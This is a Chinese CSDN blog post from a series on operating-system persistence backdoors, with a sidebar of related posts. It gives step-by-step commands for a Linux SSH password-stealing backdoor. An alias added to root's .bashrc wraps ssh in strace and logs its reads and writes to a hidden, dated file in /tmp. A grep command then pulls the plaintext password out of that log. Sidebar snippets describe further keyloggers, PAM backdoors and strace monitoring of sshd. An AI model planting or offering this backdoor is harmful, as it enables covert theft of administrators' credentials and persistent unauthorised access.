操作系统权限维持(十三)之Linux系统- SSH Keylogger记录密码后门

已于 2023-03-28 16:18:51 修改
阅读量870 收藏 2
点赞数 1
分类专栏: 操作系统权限维持 文章标签: linux 服务器 安全 网络安全 网络
于 2023-03-28 15:10:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/129816101
版权
系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门
操作系统权限维持(八)之Linux系统-SSHKey后门
操作系统权限维持(九)之Linux系统-添加用户后门
操作系统权限维持(十)之Linux系统-SSH 软连接后门
操作系统权限维持(十一)之Linux系统-SSH Wrapper后门
操作系统权限维持(十二)之Linux系统-sudoers利用后门

SSH Keylogger记录密码后门

当前系统如果存在strace的话,它可以跟踪任何进程的系统调用和数据,可以利用 strace 系统调试工具获取 ssh 的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。在当前用户的 .bashrc 里新建一条 alias ,这样可以抓取他登陆其他机器的 ssh 密码。

如果系统里面没有strace这个工具,需要去安装,否则无法使用

编辑打开.bashrc 文件:

vi /root/.bashrc

在root目录下的.bashrc 文件加入:

alias ssh='strace -o /tmp/.sshpwd-`date '+%Y-%m-%d'`.log -e read,write,connect -s2048 ssh'

在这里插入图片描述

这条命令的意思就是:首先alias是取一个叫ssh的别名,然后将登陆的密码日志就通过strace这个工具记录到tmp这个目录下并且以.sshpwd加上当前的日期时间为文件名的文件中

%Y-%m-%d%H:%M%S 是年月日时分秒

保存过后,使用命令让其生效

source .bashrc

在这里插入图片描述
所以当我们执行ssh通过root去连接的时候,或者切换用户的时候,就会将密码记录到/tmp目录下的.sshpwd加上日期时间的日志里

ssh root@127.0.0.1

这里我们输入的密码是123456

在这里插入图片描述

当我们执行完ssh远程连接的时候,我们的tmp目录下就会出现一个以.sshpwd命名的日志文件

ls -lah /tmp

在这里插入图片描述
当我们查看这个日志文件时,会出现大量的看不懂的信息

在这里插入图片描述
所以我们需要去筛选提取查看密码

grep -A 9 'password' /tmp/.sshpwd-2023-03-27.log #通过命令提取查看

在这里插入图片描述

我们往下翻找,找到红色的passwd字段的位置就是记录密码的部分

在这里插入图片描述

可以看到,框出来的部分就是我们之前输入的密码

千负
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Linux-keylogger:在Linux中配置键盘记录程序
05-11
键盘记录器 在Linux中配置键盘记录程序 在Linux机器上下载和配置keykogger的脚本 开始确认系统的电子邮件服务器: 要使用ssmtp配置电子邮件服务器,请运行smtpserver.sh脚本 授予执行权限: chmod + x smtpserver.sh 运行脚本: ./smtpserver.sh 按照脚本中的指示进行操作。 要使用postfix配置电子邮件服务器,请运行postfixserver.sh脚本 授予执行权限: chmod + x postfixserver.sh 运行脚本: ./postfixserver.sh 按照脚本中的指示进行操作。 开始执行keylogs.sh脚本。 授予执行权限: chmod + x keylogs.sh 运行脚本: ./keylogs.sh
使用sshLooterC抓取SSH密码1
08-03
使用sshLooterC抓取SSH密码1
lion-keylogger:这是用于Windows的微型键盘记录
02-18
狮子键盘记录器 这是一个很小的按键记录程序,我从借用了一些概念,并扩展了将累积的按键击转发到远程服务器的可能性。 请注意,此仓库仅用于教育目的。 作者对该程序执行的任何操作都没有错。 安装 您可以从源代码编译它,以使用自定义软件 作者
The-GTK-Keylogger:GTK键盘记录
05-10
GTK键盘记录器通过: 阿贝尔·罗梅罗·佩雷斯(aka D1W0U)@ diw0u, @ , David Reguera(又名Dreg)@ fr33project, : - [ 目录 介绍 键盘记录表 GTK键盘记录程序如何工作3.1钩住了GTK + 2 IM上下文3.2钩住了GTK + 3 IM上下文3.3挂钩技术3.3.1 x86中的钩子3.3.2 x86_64中的钩子3.4感染3.5 ld-config的问题 得到支持 如何测试GTK键盘记录器 问候 参考 附录:代码 -[1.简介 有两种情况可以决定键盘记录程序的内容:执行空间。 它们可以是用户空间或内核模式。 虽然LKM键盘记录程序取决于Linux内核的版本以及对模块加载的支持,但在Google上公开的大多数ring3软件都基于evdev。 两者都有一个问题,就是将用户的输入转换为可见的字符,或者更好地
X-ray-Echo-Romeo-Oscar:Xero-实现混合密码系统的独立于平台的Keylogger
05-13
X射线回声罗密欧奥斯卡 Xero-我的Keylogger,实现混合加密系统以保护日志,并且与平台无关。 仍然使用教科书加密技术,它生成用于加密日志的256位AES密钥,并使用4096位RSA加密来保护AES密钥。 因此,要解密所有日志,我们需要私钥,加密日志,RSA加密AES密钥文件,然后才能获取日志。 重要的是,私钥,即使加密日志和RSA-AES密钥文件存储在主机上,没有安全的私钥也无法恢复日志,因为私钥在任何地方都不会使用。不需要root或管理访问权限即可跟踪当前用户的击键。 因此,它也可以在非管理员帐户的Windows系统和非root用户的linux上使用。 加密结构 加密时: 检测到密钥,日志为纯文本形式的字符串 生成一个随机的256位AES密钥并创建一个AES对象 RSA公钥用于加密AES密钥,然后将加密的密钥导出 使用AES对象对明文日志进行编码(utf-8编码)和加密 记录
SSH Keylogger密码抓取
The current road is different, love needs to distinguish between right and wrong
11-16 1070
SSH Keylogger终端切换用户记录用户输入的终端信息可获取密码主要利用strace系统调试工具获取ssh的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。没有那么多天赋异禀,优秀的人总是努力地翻山越岭。
近源渗透测试之Keylogger实战
Xor0ne
08-01 2656
近源渗透测试之Keylogger实战 转载,侵删原创 大好人来源于公众号:雷神众测原文链接:https://mp.weixin.qq.com/s?__biz ... 8a1fcbc183d841c4#rd 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,...
常见的木马攻击类型有哪些?
2201_75571291的博客
06-26 462
按键精灵木马是一种特殊类型的木马,它利用Windows操作系统的自动化工具“AutoHotkey”,可以模拟用户的输入操作。攻击者通过植入远程控制木马,可以完全控制受害者的计算机,包括执行命令、遥控操作、下载/上传文件等。木马后门是黑客常用的一种木马类型,它具有潜在的连接、执行和控制目标系统的功能。压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。
Linux权限维持—OpenSSH&PAM后门&SSH软连接&公私钥登录
剁椒鱼头没剁椒的博客
08-22 1943
由于密码日志文件是被隐藏的,所以可以直接使用cat去查看,这里只要管理者使用ssh进行连接就会记录密码,而这些操作都是无感的,当然若管理员会去定期排查,那么该被发现还是会被发现的,这些都是基于管理员不会定期去排查才能够持久。这里要注意一个问题就是,不一定编译就能够成功,有时候根本无法编辑,从网上找的很多资料中,都跳过直接给命令,所以这里我就提前说一下,不一定能够编译成功,不成功再次重新测试,若还是不行,就拉到吧。这里重启也可能存在问题,这个实验有时候很莫名其妙的,有时候能够测试成功,有时候测试是不成功的。
linux ssh密码记录,Linux记录-ssh批量双向无密码登录
weixin_34170139的博客
05-01 165
1批量ssh密码登录#!/bin/bashset -euser=rootpassword=xxxssh_port=22iplist=(10.0.0.1 10.0.0.2 10.0.0.3)cat >> /etc/sudoers.d/app << EOFapp ALL=(ALL) ALLapp ALL=(ALL) NOPASSWD: ALLDefaults !env_res...
KatroLogger:Linux系统KeyLogger
03-11
KatroLogger KeyLogger for Linux Systems 特征 在GUI系统或CLI上运行 通过电子邮件发送数据 启动时自动运行 屏幕截图 依存关系 wget https://ufpr.dl.sourceforge.net/project/libquickmail/libquickmail-0.1.29.tar.xz tar -xvf libquickmail-0.1.29.tar.xz ./autogen.sh && ./configure && make && make install 编译中 ./configure make make install 用法 katrologger --output /path/file 通过电子邮件发送数据 争论 描述 --smtp-status 发送电子邮件服务的状态 --smtps-url SMTPS服务器 --s
keylogger 源码-包含Linux、Mac、window 三个平台
09-29
资源包括了keylogger -键盘记录的源代码,对keylogger 感兴趣的朋友可以下载下来研究下,看一下源码是如何实现的,源码写的还是不错的(仅供学习研究)
simple-key-logger:适用于Linux系统的简单键盘记录
03-11
我以前一直在使用其他一些开源键盘记录程序,但是当我升级操作系统时,它们停止工作。 我试图浏览这些按键记录程序的代码,但是它没有文档记录,混乱且复杂。 我决定制作自己的文档丰富且非常简单的键盘记录程序。 ...
mac bash file密码_抓住运维的小秘密——记录SSH明文密码与实时命令的窃取
weixin_39933484的博客
11-25 143
在获得目标机器的root权限之后,我们已经拥有了对整个系统至高无上的权力,同时我们也可以采集很多在低权限状态下无法获得的信息,通过对这些信息的获取我们能够更加全面地了解目标的安全策略,从而为后续目标的渗透提供信息支持。尽管在拥有root权限的前提下我们可以“为所欲为”,但是一些特殊信息的获取依旧需要一些方案的支持,例如管理员SSH连接的明文口令和SUDO提权的口令获取以及对于连接中的session...
操作系统权限维持(十四)之Linux系统- Strace监听SSH来源流量记录密码后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-28 1039
现在我们去/tmp/.ssh.log文件中查找密码,发现了之前我们输入的连接密码123456,(.ssh.log文件中由于记录的流量信息比较多,所以查找起密码来可能比较麻烦和费时间)之前有用别名的方式来抓取登陆其他机器时的密码、同样也可以利用strace来监听登陆本地的sshd流量。此时我们任何使用ssh登录或者切换用户的操作,密码都会被记录到/tmp/.ssh.log文件中。这里我们用ssh以root身份连接到本机,以模仿用户ssh远程连接时的场景。当我们执行完后会发现之前的窗口已经在抓取流量了。
继续谈权限维持监控获取ssh su sudo账号密码
milu_Sec的博客
01-18 1016
是一款可跟踪系统调用和信号的工具可以用下面这行命令监控 进程解读一下吧,-f -F是跟踪子进程,-p是获取pid(里面的ps aux是列出所有进程,grep是找到ashd的进程和排除grep本身进程)。-e是跟踪读写相关调用,后面就是一些设置字符串最大长度和输出到指定文件,最后的&是后台运行 (strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /t
SSH PAM后门(万能密码记录密码
网络安全。
08-19 3272
PAM是Linux默认的ssh认证登录机制,我们可以通过修改源码来实现万能密码记录登陆密码等功能。 1、在centos中需要关闭selinux。 永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。 2、查看PAM版本。 rpm -qa|grep pam 源码下载地址:http://www.linux-pam.org/library/ 3、解压。 wget http://www.linux-pam.org/library/Linux-PAM-1.1.8
linux里sub用法,Subtty记录Linux密码的利器
weixin_42321496的博客
05-13 415
一直在寻找一款能够记录SSH密码的工具,subtty这款工具能够记录su,sudo,SSH,gpg, cryptmount等,非常强大,只要是一个交互的终端即可。该工具作者是Julien Tinnes,感谢这位大神,这里也分享给大家。在作者博客下载的只有编译好的二进制程序(回头找他要源码),这里简单说一下使用方法,这个程序不需要root权限,但是很快就有root了。可以有四种方式调用程序来记录密码...
selinux安全策略可以影响ntp的方式
最新发布
ALex_zry的博客
05-18 236
默认情况下,NTP使用UDP端口123进行通信,SELinux 策略需要允许NTP守护进程访问该端口。例如,可以创建一个策略,只允许受信任的NTP服务器与本地系统通信。:SELinux 提供了详细的日志和审计功能,可以帮助管理员监控和分析NTP守护进程的行为,以及检测任何潜在的安全问题。:SELinux 还可以限制NTP守护进程可以执行的操作,例如,是否可以打开套接字、是否可以读取或写入特定的设备等。:如果SELinux策略设置得太严格,可能会与NTP的正常操作发生冲突,导致NTP无法正常同步时间。
编程实现键盘记录功能调试给出的keylogger.py程序。 (2) 运行keylogger.py程序。
11-21
编程实现键盘记录功能调试给出的keylogger.py程序需要按照以下步骤进行: 首先,需要打开keylogger.py程序所在的文件夹,并打开命令行工具。 然后,在命令行中输入以下命令来运行keylogger.py程序:python keylogger.py 程序将开始运行,并且开始记录键盘输入的信息。 在程序运行期间,可以在命令行中观察程序的输出信息,以确保程序正常运行。 为了验证程序是否正常记录键盘输入,可以打开文本编辑器或其他应用程序,并输入一些文字。然后再回到命令行中,观察程序的输出信息是否包含最新输入的文字。 如果程序正常运行,并且能够记录键盘输入的信息,那么说明已经成功实现了键盘记录功能的调试。 在调试成功之后,可以根据实际需求对keylogger.py程序进行进一步的优化和定制,如增加保存记录的功能、设置记录时间间隔等。 最后,需要注意的是,在使用键盘记录功能时需要遵守法律法规,确保不侵犯他人的隐私权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

千负

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值